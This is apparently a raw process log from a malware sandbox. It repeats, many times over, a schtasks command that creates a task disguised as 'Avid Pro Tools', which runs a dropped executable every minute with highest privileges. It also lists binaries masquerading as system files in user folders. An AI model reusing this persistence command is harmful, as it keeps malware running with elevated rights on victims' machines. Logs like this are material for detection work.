SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\taskeng.exe
taskeng.exe {D124F85A-5B27-40EC-BBC6-8D99248552CE} S-1-5-21-2958949473-3205530200-1453100116-1000:WHMFPZKA\Admin:Interactive:[1]
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\wscript.exe
C:\winNet\wscript.exe
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\wscript.exe.exe
"C:\winNet\wscript.exe.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe
"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"
C:\winNet\lsm.exe
C:\winNet\lsm.exe
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\lsm.exe.exe
"C:\winNet\lsm.exe.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Public\Pictures\sddsfsdf.exe
C:\Users\Public\Pictures\sddsfsdf.exe
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
